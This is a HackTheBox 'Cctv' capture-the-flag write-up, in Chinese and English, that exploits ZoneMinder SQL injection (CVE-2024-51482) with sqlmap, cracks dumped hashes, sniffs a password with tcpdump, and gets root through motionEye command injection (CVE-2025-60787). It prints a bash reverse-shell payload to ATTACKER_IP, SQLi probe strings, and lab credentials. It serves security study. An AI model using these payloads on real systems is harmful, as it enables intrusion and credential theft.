HackTheBox Cctv Writeup
HackTheBox Cctv 是一台简单难度的 Linux 机器。本文按照信息收集、初始访问、横向或提权路径的顺序整理完整解题过程,突出关键漏洞点、凭据来源与最终拿到 user/root 或域权限的利用链。
htb cctv
枚举
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-12 08:21 +0000
Nmap scan report for cctv.htb (10.129.231.158)
Host is up (0.12s latency).
Not shown: 601 closed tcp ports (reset), 397 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_ 256 76:1d:73:98:fa:05:f7:0b:04:c2:3b:c4:7d:e6:db:4a (ECDSA)
80/tcp open http Apache httpd 2.4.58
|_http-title: SecureVision CCTV & Security Solutions
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.75 seconds
发现80端口
echo '10.129.231.158 cctv.htb' | sudo tee -a /etc/hosts
Web
尝试默认凭据admin:admin进入到管理后台

发现版本v1.37.63 搜索得到CVE-2024-51482
CVE-2024-51482
CVE-2024-51482 是一个影响 ZoneMinder(开源 CCTV 视频监控平台) 的 SQL 注入漏洞,攻击者可以通过构造特定请求操控数据库查询,从而窃取系统数据甚至进一步控制系统。
下面是对这个漏洞的完整介绍(渗透测试/CTF常见考点)。
一、漏洞基本信息
| 项目 | 内容 |
|---|---|
| CVE | CVE-2024-51482 |
| 类型 | SQL Injection(SQL注入) |
| 影响软件 | ZoneMinder |
| 影响版本 | v1.37. ≤ 1.37.64* |
| 修复版本 | 1.37.65 |
| 攻击方式 | 远程 Web 请求 |
| 影响 | 数据库泄露、权限提升、系统控制 |
该漏洞源于 Web 接口未正确过滤用户输入,导致攻击者可以将恶意 SQL 代码注入数据库查询。
二、漏洞位置
漏洞存在于:
web/ajax/event.php
具体在 removetag 功能中。
程序直接使用用户输入:
$tagId = $_REQUEST['tid'];
$sql = "SELECT * FROM Events_Tags WHERE TagId = $tagId";
因为 tid 参数没有进行安全过滤,攻击者可以插入 SQL 语句。
三、漏洞触发点
攻击接口:
/zm/index.php?view=request&request=event&action=removetag&tid=1
其中:
tid
参数可被注入 SQL。
四、漏洞类型
主要是两种 SQL 注入形式:
1️⃣ Boolean-based SQL Injection
通过真假条件判断数据库内容。
例如:
tid=1 AND 1=1
tid=1 AND 1=2
根据页面响应差异判断数据。
2️⃣ Time-based Blind SQL Injection
通过延迟判断数据。
例如:
tid=1 AND SLEEP(5)
如果服务器延迟 5 秒,则说明注入成功。
五、漏洞影响
如果漏洞被成功利用,攻击者可以:
1️⃣ 获取数据库信息
例如:
information_schema
zm database
2️⃣ 泄露用户凭据
可以读取:
zm.Users
表中的:
Username
Password
例如:
admin : hash
3️⃣ 获取服务器访问权限
典型攻击链:
SQL Injection
↓
Dump credentials
↓
SSH login
↓
Privilege escalation
例如在某些靶机中:
ZoneMinder SQLi
↓
Dump mark:opensesame
↓
SSH login
六、CVSS 风险等级
CVSS v3 特征:
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Impact: High
意味着:
远程可利用
难度低
影响严重
攻击者可能完全控制数据库。
七、漏洞利用思路(渗透测试)
常见利用流程:
1️⃣ 发现 ZoneMinder
http://target/zm
2️⃣ 确认版本
/zm/api/host/getVersion.json
3️⃣ SQL 注入
测试:
/zm/index.php?view=request&request=event&action=removetag&tid=1
4️⃣ 使用工具
例如:
sqlmap-u"http://target/zm/index.php?view=request&request=event&action=removetag&tid=1"
5️⃣ dump 用户表
database: zm
table: Users
6️⃣ 获取系统访问
例如:
SSH
admin panel
API
八、修复方法
官方修复方式:
升级到:
ZoneMinder 1.37.65
修复方式包括:
- 参数校验
- 使用安全 SQL 查询
- 防止用户输入直接拼接 SQL。
九、为什么这个漏洞很危险
ZoneMinder通常部署在:
企业
监控系统
安防系统
工业环境
因此攻击者可能:
窃取监控数据
删除录像
控制摄像头
进入内部网络
属于 安防系统高危漏洞。
✅ 一句话总结
CVE-2024-51482 是 ZoneMinder 中的 SQL 注入漏洞,攻击者可以通过
tid参数操控数据库查询,从而获取用户凭据甚至进一步控制服务器。
利用
sqlmap -u "http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1" \
--cookie="ZMSESSID=<cookie_from_developer_tools>" \
-p tid --dbms=mysql --batch -D zm -T Users --dump
+------------+--------------------------------------------------------------+
| Username | Password |
+------------+--------------------------------------------------------------+
| admin | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| mark | $2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
| superadmin | $2y$10$t5z8uIT.n9uCdHCNidcLf.39T1Ui9nrlCkdXrzJMnJgkTiAvRUM6m |
+------------+--------------------------------------------------------------+
破解hash
echo '$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG.' > mark_hash
得到mark:opensesame
尝试ssh进入mark后
mark@cctv:~$ ss -tulnp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.54:53 0.0.0.0:*
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 4096 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:8765 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8888 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:9081 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8554 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:7999 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:1935 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.54:53 0.0.0.0:*
tcp LISTEN 0 4096 [::]:22 [::]:*
tcp LISTEN 0 511 *:80 *:*
motionEye
curl 127.0.0.1:8765
# 返回一个页面
转发该端口
ssh -L 8765:127.0.0.1:8765 mark@cctv.htb
发现motioneye且是一个登陆页面
查看源代码发现→0.43.1b4
搜索得到CVE-2025-60787
CVE-2025-60787
CVE-2025-60787 是一个出现在 **motionEye(监控摄像头管理系统)**中的 远程代码执行漏洞(RCE),本质是 OS Command Injection(命令注入)。它常见于 CCTV / 摄像头监控平台环境,因此在渗透测试或 HackTheBox 靶机中比较典型。
一、漏洞基本信息
| 项目 | 内容 |
|---|---|
| CVE | CVE-2025-60787 |
| 影响软件 | motionEye |
| 影响版本 | ≤ 0.43.1b4 |
| 漏洞类型 | OS Command Injection |
| 漏洞等级 | High (CVSS ≈ 7.2) |
| 攻击条件 | 需要管理员权限 |
| 结果 | Remote Code Execution |
该漏洞允许攻击者在服务器上执行 任意系统命令。
二、漏洞产生原因(Root Cause)
motionEye Web UI 中有一些配置字段,例如:
image_file_name
movie_filename
用户输入会:
Web UI
↓
config.py
↓
写入 camera-*.conf
↓
motion 服务读取配置
问题在于:
- 后端 没有过滤特殊字符
- 用户输入直接写入配置文件
- motion 在解析配置时 会执行 shell 语法
例如:
$(touch /tmp/pwned)
就会被当成 shell 命令执行。
三、漏洞利用原理
攻击流程:
攻击者登录 motionEye
↓
修改配置参数 (image_file_name)
↓
注入 shell payload
↓
配置写入 camera-1.conf
↓
motion 服务重启
↓
payload 执行
四、简单 PoC 示例
在 motionEye Web UI 的:
Settings → Still Images → Image File Name
填入:
$(touch /tmp/test).%Y-%m-%d-%H-%M-%S
当 motion 重新加载配置时:
/tmp/test
会被创建,说明命令执行成功。
五、真实攻击 payload
攻击者可以直接获取 shell,例如:
$(bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1')
监听:
nc -lvnp 4444
就能得到 反弹 shell。
六、漏洞影响
成功利用后攻击者可以:
- 执行任意系统命令
- 获取服务器 shell
- 控制 motionEye 容器
- 在某些情况下控制宿主机
严重时可以:
监控系统完全被接管
七、漏洞修复
官方修复方式:
1️⃣ 对配置参数进行 严格过滤
只允许:
a-z A-Z 0-9
% - _ / .
2️⃣ 在后端增加输入校验
3️⃣ 升级到修复版本
八、渗透测试中的利用场景
典型攻击链:
弱口令 / SQLi
↓
登录 motionEye admin
↓
修改 image_file_name
↓
命令注入
↓
反弹 shell
九、为什么 CCTV / 摄像头系统容易出现这种漏洞
原因是:
- 监控系统大量使用 shell脚本
- 配置文件经常被直接调用
- Web UI → config → shell 的链条很多
所以:
命令注入非常常见
十、在 HTB / 渗透环境中的意义
如果目标是:
CCTV
motionEye
ZoneMinder
出现:
camera.conf
motion
rtsp
那 CVE-2025-60787 这种漏洞非常常见的提权点。
✅ 一句话总结
CVE-2025-60787 是一个 motionEye 配置参数未过滤导致的命令注入漏洞,攻击者通过修改 Web UI 中的文件名字段即可在服务器上执行任意系统命令,从而获得远程 shell。
这是一个认证的RCE
1.前端绕过验证

输入不符合规定的字符,返回ok。说明是前端js验证,可以绕过前端限制,直接调用后端接口。
configUiValid = function() { return true; };
# 我没想出来这里
也可以直接curl访问后端端点
2.tcpdump窃听
cat /opt/video/backups/server.log
发现用户sa_mark定时登录页面
结合ifconfig,尝试tcpdump
tcpdump -i any -nn -A | grep -i sa_mark
发现
USERNAME=sa_mark;PASSWORD=X1l9fx1ZjS7RZb
然后使用admin:X1l9fx1ZjS7RZb即可登录网站随后利用CVE-2025-60787即可获取root
HTB cctv
Enumeration
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-12 08:21 +0000
Nmap scan report for cctv.htb (10.129.231.158)
Host is up (0.12s latency).
Not shown: 601 closed tcp ports (reset), 397 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_ 256 76:1d:73:98:fa:05:f7:0b:04:c2:3b:c4:7d:e6:db:4a (ECDSA)
80/tcp open http Apache httpd 2.4.58
|_http-title: SecureVision CCTV & Security Solutions
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.75 seconds
Discovered port 80.
echo '10.129.231.158 cctv.htb' | sudo tee -a /etc/hosts
Web
Attempted the default credentials admin:admin to access the admin backend.

Discovered version v1.37.63. Searching led to CVE-2024-51482.
CVE-2024-51482
CVE-2024-51482 is a SQL Injection vulnerability affecting ZoneMinder (an open-source CCTV video surveillance platform). Attackers can manipulate database queries by crafting specific requests, thereby stealing system data or even further compromising the system.
Below is a complete introduction to this vulnerability (a common topic in penetration testing/CTF).
1. Basic Vulnerability Information
| Item | Details |
|---|---|
| CVE | CVE-2024-51482 |
| Type | SQL Injection |
| Affected Software | ZoneMinder |
| Affected Versions | v1.37. ≤ 1.37.64* |
| Fixed Version | 1.37.65 |
| Attack Vector | Remote Web Request |
| Impact | Database leakage, privilege escalation, system control |
The vulnerability stems from the web interface not properly sanitizing user input, allowing attackers to inject malicious SQL code into database queries.
2. Vulnerability Location
The vulnerability exists in:
web/ajax/event.php
Specifically within the removetag functionality.
The program directly uses user input:
$tagId = $_REQUEST['tid'];
$sql = "SELECT * FROM Events_Tags WHERE TagId = $tagId";
Because the tid parameter is not safely filtered, attackers can insert SQL statements.
3. Vulnerability Trigger Point
Attack interface:
/zm/index.php?view=request&request=event&action=removetag&tid=1
Where the parameter:
tid
can be injected with SQL.
4. Vulnerability Type
Mainly two forms of SQL injection:
1️⃣ Boolean-based SQL Injection
Determining database content through true/false conditions.
For example:
tid=1 AND 1=1
tid=1 AND 1=2
Inferring data based on differences in page responses.
2️⃣ Time-based Blind SQL Injection
Inferring data through delays.
For example:
tid=1 AND SLEEP(5)
If the server delays for 5 seconds, it indicates successful injection.
5. Vulnerability Impact
If the vulnerability is successfully exploited, attackers can:
1️⃣ Obtain Database Information
For example:
information_schema
zm database
2️⃣ Leak User Credentials
Can read the:
Username
Password
columns from the:
zm.Users
table.
For example:
admin : hash
3️⃣ Gain Server Access
Typical attack chain:
SQL Injection
↓
Dump credentials
↓
SSH login
↓
Privilege escalation
For example, in some target machines:
ZoneMinder SQLi
↓
Dump mark:opensesame
↓
SSH login
6. CVSS Risk Level
CVSS v3 Characteristics:
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Impact: High
This implies:
Remotely exploitable
Low difficulty
Severe impact
Attackers could potentially gain full control over the database.
7. Vulnerability Exploitation Thought Process (Penetration Testing)
Common exploitation flow:
1️⃣ Discover ZoneMinder
http://target/zm
2️⃣ Confirm Version
/zm/api/host/getVersion.json
3️⃣ SQL Injection
Test:
/zm/index.php?view=request&request=event&action=removetag&tid=1
4️⃣ Use Tools
For example:
sqlmap-u"http://target/zm/index.php?view=request&request=event&action=removetag&tid=1"
5️⃣ Dump User Table
database: zm
table: Users
6️⃣ Obtaining System Access
Examples:
SSH
admin panel
API
Eight, Remediation
Official remediation method:
Upgrade to:
ZoneMinder 1.37.65
Remediation includes:
- Parameter validation.
- Use of secure SQL queries.
- Prevention of direct SQL concatenation with user input.
Nine, Why This Vulnerability is Dangerous
ZoneMinder is typically deployed in:
Enterprises
Monitoring systems
Security systems
Industrial environments
Therefore, attackers could:
Steal monitoring data.
Delete recordings.
Control cameras.
Gain access to internal networks.
It is classified as a High-Risk Security System Vulnerability.
✅ One-Sentence Summary
CVE-2024-51482 is an SQL injection vulnerability in ZoneMinder. Attackers can manipulate database queries through the
tidparameter to obtain user credentials and even further control the server.
Exploitation
sqlmap -u "http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1" \
--cookie="ZMSESSID=<cookie_from_developer_tools>" \
-p tid --dbms=mysql --batch -D zm -T Users --dump
+------------+--------------------------------------------------------------+
| Username | Password |
+------------+--------------------------------------------------------------+
| admin | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| mark | $2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
| superadmin | $2y$10$t5z8uIT.n9uCdHCNidcLf.39T1Ui9nrlCkdXrzJMnJgkTiAvRUM6m |
+------------+--------------------------------------------------------------+
Cracking the hash
echo '$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG.' > mark_hash
Obtained mark:opensesame
After attempting SSH into mark
mark@cctv:~$ ss -tulnp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.54:53 0.0.0.0:*
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 4096 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:8765 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8888 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:9081 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8554 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:7999 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:1935 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.54:53 0.0.0.0:*
tcp LISTEN 0 4096 [::]:22 [::]:*
tcp LISTEN 0 511 *:80 *:*
motionEye
curl 127.0.0.1:8765
# Returns a page
Forwarding the port
ssh -L 8765:127.0.0.1:8765 mark@cctv.htb
Discovered motioneye and it is a login page
Viewing the source code reveals → 0.43.1b4
Search yields CVE-2025-60787
CVE-2025-60787
CVE-2025-60787 is a Remote Code Execution (RCE) vulnerability found in motionEye (a camera management system). Its essence is OS Command Injection. It commonly occurs in CCTV / camera monitoring platform environments, making it typical in penetration testing or HTB machines.
One, Basic Vulnerability Information
| Item | Content |
|---|---|
| CVE | CVE-2025-60787 |
| Affected Software | motionEye |
| Affected Versions | ≤ 0.43.1b4 |
| Vulnerability Type | OS Command Injection |
| Vulnerability Level | High (CVSS ≈ 7.2) |
| Attack Condition | Requires administrator privileges |
| Impact | Remote Code Execution |
This vulnerability allows attackers to execute arbitrary system commands on the server.
Two, Vulnerability Root Cause
The motionEye Web UI has configuration fields such as:
image_file_name
movie_filename
User input is processed as:
Web UI
↓
config.py
↓
Written to camera-*.conf
↓
Read by the motion service
The problem is:
- The backend does not filter special characters.
- User input is written directly to the configuration file.
- motion executes shell syntax when parsing configurations.
For example:
$(touch /tmp/pwned)
Would be executed as a shell command.
Three, Vulnerability Exploitation Principle
Attack flow:
Attacker logs into motionEye
↓
Modifies configuration parameter (image_file_name)
↓
Injects shell payload
↓
Configuration written to camera-1.conf
↓
motion service restarts
↓
Payload executes
Four, Simple PoC Example
In the motionEye Web UI’s:
Settings → Still Images → Image File Name
Fill in:
$(touch /tmp/test).%Y-%m-%d-%H-%M-%S
When motion reloads the configuration:
/tmp/test
Will be created, indicating successful command execution.
Five, Real Attack Payload
Attackers can directly obtain a shell, for example:
$(bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1')
Listening:
nc -lvnp 4444
Will yield a reverse shell.
Six, Vulnerability Impact
After successful exploitation, attackers can:
- Execute arbitrary system commands.
- Obtain a server shell.
- Control the motionEye container.
- In some cases, control the host machine.
In severe cases, this could lead to:
Complete takeover of the monitoring system.
Seven, Vulnerability Remediation
Official remediation method:
1️⃣ Strictly filter configuration parameters.
Allow only:
a-z A-Z 0-9
% - _ / .
2️⃣ Add input validation on the backend.
3️⃣ Upgrade to the patched version.
Eight, Exploitation Scenario in Penetration Testing
Typical attack chain:
Weak password / SQLi
↓
Log into motionEye admin
↓
Modify image_file_name
↓
Command injection
↓
Reverse shell
Nine, Why CCTV / Camera Systems Are Prone to This Vulnerability
The reasons are:
- Monitoring systems heavily use shell scripts.
- Configuration files are frequently called directly.
- There are many chains from Web UI → config → shell.
Thus:
Command injection is very common.
Ten, Significance in HTB / Penetration Environments
If the target is:
CCTV
motionEye
ZoneMinder
And the following appears:
camera.conf
motion
rtsp
Then a vulnerability like CVE-2025-60787 is a very common privilege escalation vector.
✅ One-sentence Summary
CVE-2025-60787 is a command injection vulnerability caused by unfiltered motionEye configuration parameters. An attacker can execute arbitrary system commands on the server by modifying the filename field in the web UI, thereby obtaining a remote shell.
This is an authenticated RCE.
1. Frontend Bypass Verification

Entering characters that don’t meet the requirements returns “ok”. This indicates frontend JS validation, allowing bypass of the frontend restrictions to directly call backend interfaces.
configUiValid = function() { return true; };
# I haven't figured this part out here
You can also directly use curl to access the backend endpoint.
2. tcpdump Sniffing
cat /opt/video/backups/server.log
Discovered that user sa_mark regularly logs into the page.
Combining this with ifconfig, attempt tcpdump sniffing.
tcpdump -i any -nn -A | grep -i sa_mark
Discovered:
USERNAME=sa_mark;PASSWORD=X1l9fx1ZjS7RZb
Then, using admin:X1l9fx1ZjS7RZb allows logging into the website. Subsequently, exploiting CVE-2025-60787 can be used to gain root access.